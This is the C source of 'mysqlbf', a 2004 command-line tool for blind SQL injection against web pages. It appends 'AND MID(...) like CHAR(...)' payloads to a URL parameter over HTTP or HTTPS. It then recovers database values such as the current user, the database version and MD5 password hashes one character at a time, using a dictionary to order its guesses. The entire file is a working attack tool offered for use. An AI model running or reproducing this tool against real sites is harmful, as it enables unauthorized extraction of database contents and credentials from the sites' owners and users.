/* $Id: mysqlbf.c,v 1.14 2004/09/10 04:23:11 ilo-- Exp $
 *
 * Abstract : Adaptive sql bruteforce V2!
 * Cross-ref: none
 * Author:    ilo-- http://www.reversing.org
 * 
 * Compile instructions:
 *
 * windows: cl /MD /DWIN32 mysqlbf.c ws2_32.lib   
 * linux  : gcc mysqlbf.c -o mysqlbf
 * W32SSL :cl mysqlbf.c /DWIN32 /DmSSL libeay32.lib ssleay32.lib ws2_32.lib /Id:\openssl-0.9.7d\inc32\
 * linuxSSL: gcc mysqlbf.c -DmSSL -o mysqlbf
 *
 * INTERACTIVE define transform program into interactive, allowing several request per
 * execution. 
 *
 * Usage of Program 
 *
 * # mysqlbf [http[s]://]host[:port]/[path/][file]?arg= [*]sqlval[:length][=initval] match
 * # mysqlbf -help
 *
 * If interactive mode is enabled, place sql sentences after prompt.
 *
 * Resume:
 *
 * Main features now: Version 2 of mysqlbf now support https protocol.
 * 
 * This program injects sql statments to bruteforce the sqlval in pages where
 * the injection is after the select and no union is posible. It uses url quotation
 * to avoid php or asp trimming. It also avoids the use of " and chars like those.
 *
 * The injected code is: AND MID($SQLSTAT,$N1,$N2) like CHAR($CAR) 
 *
 * current readable objects:
 *
 * - version(), database()
 * - user(), system_user(), session_user(), current_user()
 * - last_insert_id(), connection_id()
 * - all data available in the query
 *
 * - cudate() curtime()
 *
 * Important notes:
 * 
 * - getopt removed to leave just one human interface in linux/windows.
 * - the main idea is to get an interface allowing bruteforce some values.
 * - added doxygen quotation for doc.
 *
 * TODO:
 *
 * - not here.
 *
 * License conditions:
 *
 * License? you should NOT have this file!!, so please, gracefully delete it.
 */


/* this is for vc++ and /MD option, a way to reduce the size of the final 
 * exe file. Thanks mrsilver ;)
 */
#pragma comment(linker,"/FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")

// Include section 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#ifdef WIN32 //os depend.
 #include <winsock.h>
 #include <windows.h>
#else
 #include <unistd.h>
 #include <sys/socket.h>
 #include <netdb.h>
 #include <arpa/inet.h>
#endif

#ifdef mSSL
 #include <openssl/crypto.h>
 #include <openssl/x509.h>
 #include <openssl/pem.h>
 #include <openssl/ssl.h>
 #include <openssl/err.h>
#endif


#define dMatch  "Contribu"
#define dChar   "abcdefghijklmnopqrstuvwxyz0123456789$.: -()[]{}@=/\\|#?&!<>"
#define MD5Char "abcdef0123456789$."
#define NChar   "0123456789"
#define f_DICT  "./dict.txt"

#define MAXBUFFER 64000
#define TIMEOUT_S 1
#define TIMEOUT_U 1

// default s.o. definitions
// overriden by windows if-defined
#define tsock int      //definition for socket
#define sclose close   //definition for close


/* Windows implementation.
 *
 * We need a way to satisfy linux&windows compiling support. We redefine 
 * windows types and functions here.
 */
#ifdef WIN32 
 #undef  tsock
 #define tsock SOCKET
 #undef  sclose
 #define sclose closesocket

/** \brief fills a buffer with zeroes
 *
 *   Completly destrois the content of a buffer in str length bytes. 
 */
void bzero (char *str, int length){
	 while(length-- > 0) *str++ = '\0';
}

#endif //WIN32 impl.

unsigned int dPort = 80; /** Default port: HTTP port : global for https support (443)*/

#ifdef mSSL
int use_https =0; //global flag because of function struct

void verify_ssl(SSL *ssl){
  long verify_result;

  struct sslerror_t {
    long result_code;
    char *ssl_error;
    char *ssl_errordetail;
  };

  struct sslerror_t error_table[]={
    {X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT,
     "unable to get issuer certificate. ",
     "the issuer certificate could not be found: this occurs if the"
     "issuer certificate of an untrusted certificate cannot be found."
    },
    {X509_V_ERR_UNABLE_TO_GET_CRL,
     "unable to get certificate CRL. ",
     "the CRL of a certificate could not be found. Unused."
    },
    {X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE,
     "unable to decrypt certificate's signature",
     "the certificate signature could not be decrypted. This means that"
     "the actual signature value could not be determined rather than it"
     "not matching the expected value, this is only meaningful for RSA keys"
    },
    {X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE,
     "unable to decrypt CRL's signature",
     "the CRL signature could not be decrypted: this means that the"
     "actual signature value could not be determined rather than it not"
     "matching the expected value. Unused."
    },
    {X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY,
     "unable to decode issuer public key",
     "the public key in the certificate SubjectPublicKeyInfo could not be read"
    },
    {X509_V_ERR_CERT_SIGNATURE_FAILURE,
     "certificate signature failure",
     "the signature of the certificate is invalid"
    },
    {X509_V_ERR_CRL_SIGNATURE_FAILURE,
     "CRL signature failure",
     "the signature of the certificate is invalid. Unused"
    },
    {X509_V_ERR_CERT_NOT_YET_VALID,
     "certificate not valid",
     "The certificate is not valid yet"
    },
    {X509_V_ERR_CERT_HAS_EXPIRED,
     "certificate expired",
     "The certificate has expired",
    },
    {X509_V_ERR_CRL_NOT_YET_VALID,
     "CRL is not yet valid",
     "the CRL is not yet valid. Unused."
    },
    {X509_V_ERR_CRL_HAS_EXPIRED,
     "CRL has expired",
     "the CRL has expired. Unused."
    },
    {X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD,
     "format error in certificate's notBefore field",
     "the certificate notBefore field contains an invalid time"
    },
    {X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD,
     "format error in certificate's notAfter field",
     "the certificate notAfter field contains an invalid time."
    },
    {X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD,
     "format error in CRL's lastUpdate field",
     "the CRL lastUpdate field contains an invalid time. Unused."
    },
    {X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD,
     "format error in CRL's nextUpdate field",
     "the CRL nextUpdate field contains an invalid time. Unused.",
    },
    {X509_V_ERR_OUT_OF_MEM,
     "out of mem",
     "out of mem"
    },
    {X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT,
     "self signed certificate",
     "the passed certificate is self signed and the same certificate"
     "cannot be found in the list of trusted certificates."
    },
    {X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN,
     "self signed certificate in certificate chain",
     "the certificate chain could be built up using the untrusted"
     "certificates but the root could not be found locally."
    },
    {X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY,
     "unable to get local issuer certificate",
     "the issuer certificate of a locally looked up certificate could not"
     "be found. This normally means the list of trusted certificates is"
     "not complete."
    },
    {X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE,
     "unable to verify the first certificate",
     "no signatures could be verified because the chain contains only one"
     "certificate and it is not self signed."
    },
    {X509_V_ERR_CERT_CHAIN_TOO_LONG,
     "certificate chain too long",
     "the certificate chain length is greater than the supplied maximum"
     "depth. Unused."
    },
    {X509_V_ERR_CERT_REVOKED,
     "certificate revoked",
     "the certificate has been revoked. Unused."
     },
    {X509_V_ERR_INVALID_CA,
     "invalid CA certificate",
     "a CA certificate is invalid. Either it is not a CA or its"
     "extensions are not consistent with the supplied purpose."
    },
    {X509_V_ERR_PATH_LENGTH_EXCEEDED,
     "path length constraint exceeded",
     "the basicConstraints pathlength parameter has been exceeded."
    },
    {X509_V_ERR_INVALID_PURPOSE,
     "unsupported certificate purpose",
     "the supplied certificate cannot be used for the specified purpose."
    },
    {X509_V_ERR_CERT_UNTRUSTED,
     "certificate not trusted",
     "the root CA is not marked as trusted for the specified purpose."
    },
    {X509_V_ERR_CERT_REJECTED,
     "certificate can't be verified",
     "the root CA is marked to reject the specified purpose.",
    },
    {X509_V_ERR_SUBJECT_ISSUER_MISMATCH,
     "subject issuer mismatch",
     "the current candidate issuer certificate was rejected because its"
     "subject name did not match the issuer name of the current"
     "certificate. Only displayed when the -issuer_checks option is set."
    },
    {X509_V_ERR_AKID_SKID_MISMATCH,
     "authority and subject key identifier mismatch",
     "the current candidate issuer certificate was rejected because its"
     "subject key identifier was present and did not match the authority"
     "key identifier current certificate. Only displayed when the"
     "-issuer_checks option is set."
    },
    {X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH,
     "authority and issuer serial number mismatch",
     "the current candidate issuer certificate was rejected because its"
     "issuer name and serial number was present and did not match the"
     "authority key identifier of the current certificate. Only displayed"
     "when the -issuer_checks option is set."
    },
    {X509_V_ERR_KEYUSAGE_NO_CERTSIGN,
     "key usage does not include certificate signing",
     "the current candidate issuer certificate was rejected because its"
     "keyUsage extension does not permit certificate signing."
    },
    {X509_V_ERR_APPLICATION_VERIFICATION,
     "application verification failure",
     "an application specific error. Unused."
    }
  };

  verify_result = SSL_get_verify_result(ssl);

  if ( verify_result == X509_V_OK ){
    printf("Certificate verified!\n");
  } else {
    int i;

    printf("Can't verify certificate\n");
    for ( i=0 ; i<sizeof(error_table)/sizeof(error_table[0]) ; i++ ){
      if ( error_table[i].result_code == verify_result ){
	printf("  SSL_get_verify_result Id = %d\n", (int)verify_result);
	printf("    %s\n", error_table[i].ssl_error);
	break;
      }
    }
  }
}

//HTTPS
/** \brief send a request using an opened socket and recieves the answer
 *
 * Send a string trougth a socket and recieves a maximun of mSz bytes from the same 
 * socket as a reply. 
 *
 * \param sock socket to send and receive
 * \param request buffer to send before receiving loop
 * \param buffer filled with received data
 * \param mSz maximun size of receive buffer
 *
 * \return total size of bytes received.
 */
unsigned long fRequest_ssl(SSL *ssl, char *request, char *buffer, int mSz){
int	rSz=0; //each reply
int	tSz=0; //total received

	//send(sock,request,strlen(request),0);
	SSL_write(ssl, request, strlen(request));
	bzero(buffer,mSz);

	do
	{
		//rSz=recv(sock,buffer+tSz,mSz-tSz,0);		
		rSz = SSL_read(ssl, buffer+tSz, mSz-tSz);
		tSz+=rSz;
		//FD_ZERO(&sock_set);
		//FD_SET(sock,&sock_set);
		//tOut.tv_sec=TIMEOUT_S;
		//tOut.tv_usec=TIMEOUT_U;
	}
	while((tSz<mSz) && (rSz!=0));
	return tSz;
}

#endif


//SYSYEM INTERFACE FUNCTIONS

/** \brief exit showing an error msg. 
 *
 *   Finish program execution
 */
void mExit (char *str, int eVal){
	printf ("%s\n", str);
	exit (eVal);
}

/** \brief show usage information. 
 */
void usage(char *pName) {
#ifdef mSSL
	printf(" Usage: %s [http[s]://]host[:port][/path/][file]?args [*]sqlval[:length][=initval] match\n", pName);
#else
	printf(" Usage: %s [http://]host[:port][/path/][file]?args [*]sqlval[:length][=initval] match\n", pName);
#endif
	printf("\n type %s -help for more info.\n",pName);
	mExit("",0);
}

/** \brief show help information. 
 */
void help(char *pName) {
	mExit(" [?] help: see readme.\n",0);
}


// ARG PARSING FUNCTIONS

/** \brief break a string in two parts by token. 
 *
 *   Completly destrois the ascii0 string, so use it when you don't need what's 
 *   after the separator or you will loss it. Result is that "str1?str2" string 
 *   ends as "str1", and str2 is returned as other ascii0 string.
 *
 *  \return pointer to second ascii0 string or NULL.
 */
char *fBrk (char *str, char *tok){
char *tmp;
	if (tmp = strstr (str, tok)){
		tmp[0]=0;
		tmp++;
		if (strlen(tmp)<1){
		    tmp = NULL;
		}
	} return tmp;
}

/** \brief find port number in arguments
 *
 *   Completly destrois the ascii0 string of argument, so use it when 
 *  you don't need what's after the port number or you will loss it. Result
 *  is that "host:port" string ends as "host", and port is converted to uint.
 *  Also is used to get the length of the sqlstat to guess "sqlstring:length".
 *
 *  \return the number of port or default port if error.
 */
unsigned int fBrkUInt (char *hName, unsigned int defPort){
char *tmp;
unsigned int port=defPort;
	if (tmp = strstr (hName, ":")){
		tmp[0]=0;
		tmp++;
		if (strlen(tmp)>0){
			port=strtoul(tmp,0,10);
		    if((port > 65535) || (port < 1)){
					printf (" wrn - wrong port, using default: %d\n", dPort);
					port=defPort;
			}
		}
	} return port;
}

/** \brief find host string in arguments
 *
 *   Completly remove 'http://' tag in the ascii0 string of argument. Result
 *  is that "http://host/uri" string ends as "host/uri", 
 *
 *  \return pointer to ascii0 string where full path host/uri is stored.
 */
char *fHost (char *hName){
char *tmp;
int c;

	//convert to case. dns resolution is not case dependant.
	for(c=0; c<5;c++)
		hName[c]=tolower(hName[c]);

	//check for https
	if (tmp = strstr (hName, "https://")){
#ifdef mSSL
		use_https=1;
		dPort=443;
		tmp+=8;
		return tmp;
#else
		mExit (" [-] http over ssl protocol is not supported.", -1);
#endif
	}

	//search the http header.
	if (tmp = strstr (hName, "http://")){
		tmp+=7;
	} else { 
		tmp=hName;
	} return tmp;
}


// NETWORK FUNCTIONS

/** \brief resolve ascii0 hostname to s_addr
 *
 *  Resolve hostname if it's not a valid inet address.
 *
 *  \return host value resolved or 0 if error.
 */
unsigned long resol(char *hName) {
struct in_addr addr;
struct hostent *host_ent;
	
	if((addr.s_addr = inet_addr(hName)) == -1) {
		printf (" resolving %s\n", hName);
		if(!(host_ent = gethostbyname(hName))) return(0);
		memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
	}return(addr.s_addr);
}

/** \brief send a request using an opened socket and recieves the answer
 *
 * Send a string trougth a socket and recieves a maximun of mSz bytes from the same 
 * socket as a reply. 
 *
 * \param sock socket to send and receive
 * \param request buffer to send before receiving loop
 * \param buffer filled with received data
 * \param mSz maximun size of receive buffer
 *
 * \return total size of bytes received.
 */
unsigned long fRequest(tsock sock, char *request, char *buffer, int mSz){
int	rSz=0; //each reply
int	tSz=0; //total received
struct timeval tOut;
int	res_select;
fd_set sock_set;

	send(sock,request,strlen(request),0);
	bzero(buffer,mSz);
	do
	{
		rSz=recv(sock,buffer+tSz,mSz-tSz,0);		
		tSz+=rSz;
		FD_ZERO(&sock_set);
		FD_SET(sock,&sock_set);
		tOut.tv_sec=TIMEOUT_S;
		tOut.tv_usec=TIMEOUT_U;
	}
	while( (tSz<mSz) && (rSz!=0) && (res_select=select(sock+1,&sock_set,NULL,NULL,&tOut)) && (res_select != -1 ) );
	return tSz;
}



//DICTIONARY FUNCTIONS

char *fLoad (char *fName, char *fbuf){
FILE *fp;
char *tmpa, *tmpb, *tmp2; //hold buffer temporally.
unsigned int i;
unsigned int fsize=0;


	if (fp = fopen(fName, "r+")){
		//get fsize
		fseek(fp, 0, SEEK_END);
		fsize = ftell(fp);
		rewind (fp);
		printf (" [+] dicctionary lenght: %d\n", fsize);
		
		//load into memory
		if (!(tmpa = (char *)malloc (fsize+1))){
			printf (" [-] can't load dicctionary\n");
			return NULL;
		}
		bzero(tmpa, fsize+1);

		printf (" [+] dict loaded %d bytes\n", fread ((char *)tmpa, sizeof(char), fsize, fp));
		if (fsize < 354){mExit("\n WHY DO YOU USE DEFAULT DICTIONARY???? PLEASE INSERT SOME WORDS!!\n",-1);}
		fclose (fp);

		tmpb=tmpa;

		//loop to the end of header.
		while (tmp2 = strstr(tmpb, "\n#")){
			tmpb=tmp2+1;
		}// and Skip this line
		tmp2=strstr(tmpb+2, "\n");

		//alloc and copy dictionary to buffer
		if (!(fbuf = (char *)malloc (strlen(tmp2)+1))){
			printf (" [-] can't load dicctionary\n");
			return NULL;
		}

		bzero(fbuf, strlen(tmp2)+1);
		memcpy(fbuf, tmp2, strlen(tmp2));

		//loop to replace ' ' with '\n'
		for (i=0; i<fsize; i++){
			if (fbuf[i]==' ') fbuf[i]='\n';
		}


		free(tmpa);
	} else {
		printf (" [?] there's no dictionary\n");
		return NULL;
	}
	return fbuf;
}

/** \brief sort the charset to maximun hits by input
 *
 *   This code is horrible. Rewrite
 *
 *  \param cSet charset to sort
 *  \param sInput input string
 *  \param fbase dictionary
 * 
 *	\return charset but sorted.
 */
void cSort (char *cSet, char *sInput, char *fbase){
int l;
char *cStr = NULL;
int  *sInt = NULL;
char *sBuf = NULL;
char *fc = NULL;

int cnt = 0; // runs original charset 
int act = 0; // runs converted charset
int ind = 0; // runs 'exit word'
int found;


int iLen;
int tInt = 0; //temporal int for sorting.
int tMax = 0; //temporal int for sorting


	fc = fbase;

	//no criteria to sort	
	if (strlen(sInput)==0) return;
	if (strlen(fc)==0) return;

	//init
	l = strlen(cSet);
    cStr = (char *)malloc (l+1);
    sInt = (int *)malloc ((l+1)*4);
    sBuf = (char *)malloc (l+1);
	if ((!cStr)||(!sInt)||(!sBuf)) goto salir;


testing: 

	//when recursiving, string my be NULL!
	iLen=strlen(sInput);
	if (iLen==0) goto salir;

    cnt = 0; // runs original charset 
    act = 0; // runs converted charset
    ind = 0; // runs 'exit word'
    found=1;

	tInt = 0; //temporal int for sorting.
	tMax = 0; //temporal int for sorting


	memset ((int *)sInt, 0, (l+1)*4);

	//run the dict, looking for matches with the string.
	//each match should give a 
	while (fc = strstr (fc,sInput)){
		if (strlen (fc) > iLen){
			
			//loop the charset looking for the same char
			//and increase it's counter.
			cnt=0;
			while (cnt++ <= l){
				if (cSet[cnt-1] == fc[iLen]){
					sInt[cnt]=sInt[cnt]+1;		
				}
			}
		}
		fc++;
	}


	//Once here, we have sInt[0 to .. strlen(input)] with the count
	//of their matches in dict. Now we have to order them, or print
	//the chars to a buffer 'sBuf', so exitword gets filled. There's 
	//to print first the biggest sInt[cnt], to the lower, not printing
	//the zeroed sInt[n].
	memset (sBuf, 0, l*sizeof(char)+1);
	tInt = 0;
	tMax = sInt[0];
	cnt = 0;
	found=1;

	while (found){
		cnt=0;
		found=0;
		
		while (cnt <= l){
			if (sInt[cnt] == 0){
				cnt++;
				continue;
			}
			if (sInt[cnt] >= tMax){
				found = 1;
				tMax = sInt[cnt];
				tInt = cnt;
			}
			cnt++;
		}
		strncat (sBuf,&cSet[tInt-1],1);
		sInt[tInt]=0;
		tMax=sInt[0];
		tInt=0;
		cnt++;
	}

	memset ((char *)cStr, 0, l+1);

    //char *sBuf="3a2b5c4d1e5f6g";

	// funtion input:
	// sBuff has the word with the char most used based in input.
	// if we have as input 'local', and in the dictionary exists
	// localhost, localhome and localnet, exit word should be
	// "hn" as 'h' is the most used word, and 'n' is the next.
	while (ind<strlen(sBuf)){ //in all the 'exit word'
		cnt=0;
		while(cnt<=l){ //loop all the original charset
			if (cSet[cnt]==sBuf[ind]){//if that char exists in the charset
				cStr[act]=sBuf[ind];  //save in that position.
				cSet[cnt]='_';  //and delete from orig. charset.
				act++;			//go to next position.
				continue;
			}
			cnt++;
		}
		ind++;
	}

	// fill the sorted charset with the remaining chars in the 
	// original one.
	cnt=0;
	while (cnt< l){
		if (cSet[cnt] != '_') {
			cStr[act]=(char)cSet[cnt];
			act++;
		}
		cnt++;
	}

	if (strcmp (cSet, cStr)==0) {
		memset ((char *)cStr, 0, l*sizeof(char)+1);
		memset ((char *)sBuf, 0, l*sizeof(char)+1);
		memset ((int *)sInt, 0, (l+1)*4);
	
		sInput++;
		fc = fbase;
		goto testing;
	}

	memset  (cSet, 0, l);
	strncpy (cSet, cStr, l);

salir:
	if (cStr) free (cStr);
	if (sInt) free (sInt);
	if (sBuf) free (sBuf);
}


void migets(char *buff, int I){
int i=0; char c=0;
	bzero(buff,I);
	printf(" sqbl> ");
	while (i<=I){
	   c=fgetc(stdin);
	   if (c=='\n'){
             i=I+1;
	   } else {
	     buff[i++]=c;
	   }
	}
	buff[I]=0;
	fflush(stdin);
 return;
}




int main(int argc, char *argv[]) {

//network
#ifdef WIN32
 WORD wVersion;
 WSADATA wsaData;
#endif
struct hostent *hp;
struct sockaddr_in nHost;
char *rBuffer;		/** receiving buffer */
char *sBuffer;		/** receiving buffer */
tsock sock;			/** used socket */

//arguments
char *sHost;		/** clean hostname for net resolution */
unsigned int sPort; /** port of server */
char *sArg;			/** string to cgi arguments */
char *sUri;			/** global uri of phpnuke path */
char *sSql;			/** sql value to guess */
int  lSql=0;		/** sql reply length */
char *sMat=dMatch;	/** matching string */
char *charset;      /** charset to use (default is full) */
char *sIni;			/** string initial value */

//main loop
int cnt1=0;			/** bf counter 1 */
int cnt2=0;			/** bf counter 2 */
char *nStr;			/** result output */
char *nInj;			/** injection buffer */
int tHits=0;		/** total of hits to server */

//personal config.
//char *sOpt;			/** options file */
#ifdef INTERACTIVE
 char strCmdb[256];
 char *strCmd=&strCmdb[0];
#endif

FILE *fp;

#ifdef mSSL
SSL *ssl=0;
SSL_CTX *ctx=0;
SSL_METHOD *(*ssl_method)() = SSLv23_client_method;
X509 *server_cert;
char *str;
unsigned int ssl_verb = 0; //set to 0 when cert info is shown. Now set to 0 as default
						   //because of verbosity untill output control applied.
#endif

//dict
char *fc=NULL;


	printf("\n http-sql adaptive bruteforce  $Revision: 1.13 $");
	printf("\n ilo@reversing.org  http://www.reversing.org\n\n");
	printf(" This program is now being developed by Dab at\n");
	printf(" http://www.unsec.net\n\n");
	if((argv[1])&&(!strcmp(argv[1],"-help"))) help(argv[0]);

	if( argc != 4) { //Number of args 
		usage(argv[0]);
	}

	charset = (char *)malloc (256);
	memset (charset,0,256);
	strncpy (charset, dChar, strlen(dChar));

	//options are parsed here
    sHost = fHost(argv[1]);
	if (strlen(sHost)<1) usage(argv[0]);
	sUri  = fBrk(sHost, "/");
	if (sUri == NULL) usage(argv[0]);
	if (strstr(sUri,"?") == NULL) usage(argv[0]);
	sArg  = fBrk(sUri, "?");
	sPort = fBrkUInt(sHost, dPort);
	sSql  = argv[2];
	sIni  = fBrk(sSql, "=");
	lSql  = fBrkUInt(sSql, 0); //reusing functs.. 

	//Set selected charset
	if (sSql[0] == '*'){ //MD5 charset
		memset (charset,0,256);
		strncpy (charset, MD5Char, strlen(MD5Char));
		sSql++;
	} else {
	 if (sSql[0] == '!'){ //Numeric only charset
		memset (charset,0,256);
		strncpy (charset, NChar, strlen(NChar));
		sSql++;
	 }
	}

	sMat = argv[3];

	//Show parsed options
	printf (" host: %s\n", sHost);
	printf (" port: %d\n", sPort);
	printf (" uri : %s\n", sUri);
	printf (" args: %s\n", sArg);
	printf (" sql : %s\n", sSql);
	printf (" sqlI: %s\n", sIni);
	printf (" sqlL: %d\n", lSql);
	printf (" mat.: %s\n", sMat);
	printf (" char: %s\n\n", charset);

#ifdef WIN32 //Network setup in windows must be done.
    wVersion = MAKEWORD( 1, 1 );
    if ((WSAStartup(wVersion,&wsaData)) != 0){
        mExit(" err - Initializing winsock\n", -1);
    }
#endif

#ifdef mSSL
	SSL_library_init(); 
	SSL_load_error_strings(); 
	ctx = SSL_CTX_new(ssl_method());
	ssl = SSL_new(ctx);
#endif

	//load dictionary
	fc = fLoad(f_DICT, fc);

	//Default host resolution for further use
	nHost.sin_family = AF_INET;
	nHost.sin_addr.s_addr = resol(sHost);
	nHost.sin_port = htons((unsigned short)sPort);
	if(!nHost.sin_addr.s_addr) mExit (" [-] err - host not found\n", -1);

	//buffer allocation.
	if(!(rBuffer=(char *)malloc(MAXBUFFER))) mExit(" [-] err - rbuffer malloc()\n",-1);
	if(!(sBuffer=(char *)malloc(MAXBUFFER))) mExit(" [-] err - sbuffer malloc()\n",-1);
  	if(!(nStr =(char *)malloc(256))) mExit(" [-] err - nstr malloc()\n",-1);
  	if(!(nInj =(char *)malloc(256))) mExit(" [-] err - ninj malloc()\n",-1);

#ifdef INTERACTIVE  //Label. Interactive loop jumps here
loopInter:
#endif
	
	bzero (sBuffer, MAXBUFFER);
	bzero (rBuffer, MAXBUFFER);
	bzero (nStr, 256);
	bzero (nInj, 256);

	//Copy initial value
	if (sIni) strncpy (nStr, sIni, strlen (sIni));

		//MAIN BUCLE :
		// -build request
		// -connect
		// -send
		// -close
		// -parse

     cnt1=strlen(nStr)+1; //first counter
	 while(cnt1<256){ //bsize
			 cnt2=0;

		 //sort the charset here!!!!
		 if (fc) cSort (charset, nStr, fc);

		 while (cnt2 < strlen(charset)){
			 tHits++; //increase counter
			 //show current sequence fo guess
			 printf ("\r trying : %s%c", nStr, charset[cnt2]);
			 fflush (stdout);
			 bzero (sBuffer, MAXBUFFER);
			 bzero (nInj, 256);

			 //AND MID($SQLSTAT,$N1,$N2) like CHAR($CAR)
			 sprintf (nInj, "%s+AND+MID%%28%s,%d,1%%29+like+CHAR%%28%d%%29",sArg, sSql, cnt1, charset[cnt2]); 
//	 	     sprintf (sBuffer, "POST /%s HTTP/1.0\nHost: %s\nContent-Type: application/x-www-form-urlencoded\nContent-Length: %d\n\n%s\n"
//				 , sUri, sHost, strlen(nInj), nInj); 
	 	     sprintf (sBuffer, "GET /%s?%s HTTP/1.0\nHost: %s\nContent-Type: application/x-www-form-urlencoded\n\n\n", sUri, nInj, sHost); 

			 //now connect, and send the request
			 if (sock = socket(AF_INET, SOCK_STREAM, 0)){
				 if (!connect(sock,(struct sockaddr *)&nHost, sizeof(nHost))){
#ifdef mSSL
					 if (use_https){
						 SSL_set_fd(ssl, sock);
						 SSL_connect(ssl);

//following lines are commented because of verbosity

						/* get server cipher (DES-CBC3-MD5) */  
						 {
							 const char *cipher;
							 cipher = SSL_get_cipher(ssl);
							 if (ssl_verb) printf(" server is using cifper \n", cipher);
						 }

						 /* get ssl version SSL (SSLv2, SSLv3/TLSv1) */
						 {
							 char *version;
							 version = SSL_get_cipher_version(ssl);
							 if (ssl_verb) printf("SSL cipher version %s\n", version);
						 }

						 server_cert = SSL_get_peer_certificate(ssl); 
						 if (ssl_verb) printf("Cert info:\n");

						 str = X509_NAME_oneline(X509_get_subject_name(server_cert), 0, 0);
						 if (ssl_verb) printf("   subject: %s\n", str);

						 str = X509_NAME_oneline(X509_get_issuer_name(server_cert), 0, 0);
						 if (ssl_verb) printf("   issuer: %s\n", str);

						 if (ssl_verb){
							 BIO *STDout = BIO_new_fp(stdout, BIO_NOCLOSE);

							 ASN1_TIME *notBefore = X509_get_notBefore(server_cert);
							 ASN1_TIME *notAfter  = X509_get_notAfter(server_cert);

							 BIO_printf(STDout, "   certificate age\n    since : ");
							 ASN1_TIME_print(STDout, notBefore);
							 BIO_printf(STDout, "\n");
							 BIO_printf(STDout, "    until : ");
							 ASN1_TIME_print(STDout, notAfter);
							 BIO_printf(STDout, "\n");
							 BIO_free(STDout);
						 }

						 if (ssl_verb) verify_ssl(ssl);
						 ssl_verb=0;
						 X509_free(server_cert);


						 fRequest_ssl(ssl, sBuffer, rBuffer, MAXBUFFER);
					 } else {
						 fRequest(sock, sBuffer, rBuffer, MAXBUFFER);
					 }
#else				 // if ssl is not supported override previous if 
					 fRequest(sock, sBuffer, rBuffer, MAXBUFFER);
#endif
					 sclose (sock);
				 } else { 
					 mExit (" [-] err - can't conect to host\n", -3); 
				 }
			 } else {
				 mExit (" [-] err - can't open socket\n",-3);
			 }

			 //HTTP CHECK all correct request return the OK string
			 if (!strstr(rBuffer, "200 OK")) {
				printf ("\r                                                                       \r");
				mExit (" [-] err - http not accesible directly!\n",-1);
			 }

			 //check if the answer contains our match data
			 //if so, exit this loop.
			 if (strstr(rBuffer, sMat)) goto cFound;

			 //continue with next char in charset
			 cnt2++;
		 }

cFound:
		 //There are two reasons why we reach here:
		 // 1. we've found a valid char in the sql stat.
		 // 2. there're no more chars to check.
		 
		 //no more chars and none found. bad luck
		 if ((cnt2 == strlen(charset))&&(cnt1 < lSql)){
			 mExit ("charset small\n",0);
		 }
		 
		 //add the correct char to the result string
		 nStr[strlen(nStr)]=(char)charset[cnt2];

		 //this is the worst case: none matched but we don't know length
		 if ((cnt2 == strlen(charset))&&(cnt1 > lSql)){
			 printf ("\r                                                                       \r");
			 printf (" best guess:\n %s = %s\n total hits: %d\n\n", sSql, nStr,tHits);

#ifdef INTERACTIVE //Loop for next request
			 goto cntInt;
#endif

			 mExit("", 0);
		 }

		 //finished!
		 if (cnt1 == lSql) goto cExit;
		 cnt1++;
	 }

cExit:

	 //we can show the result now and be happy
	 printf ("\r                                                                       \r");
	 printf ("\r %s = %s\n total hits: %d\n\n", sSql, nStr, tHits);

#ifdef INTERACTIVE
	 //Interactive mode 
cntInt:
	 migets (&strCmdb[0], 200);
	 if (strcmp (strCmd, "quit")){
		sSql  = strCmd;
		sIni  = fBrk(sSql, "=");
		lSql  = fBrkUInt(sSql, 0); //reusing functs.. 
		
		//load default charset again...
		memset (charset,0,256);
		strncpy (charset, dChar, strlen(dChar));

		if (sSql[0] == '*'){ //MD5 charset
		 memset (charset,0,256);
		 strncpy (charset, MD5Char, strlen(MD5Char));
		 sSql++;
		} else {
	     if (sSql[0] == '!'){ //Numeric only charset
		  memset (charset,0,256);
		  strncpy (charset, NChar, strlen(NChar));
		  sSql++;
		 }
		}

		goto loopInter;		 
	 }
#endif //Interactive

     free(rBuffer); // ^_^

#ifdef mSSL
	 if (ssl){
		 SSL_shutdown(ssl); 
		 SSL_free(ssl); 
		 if (ctx) SSL_CTX_free(ctx);
	 }
#endif

#ifdef WIN32
    WSACleanup( );
#endif
	return 0;
}

/* End Of File */

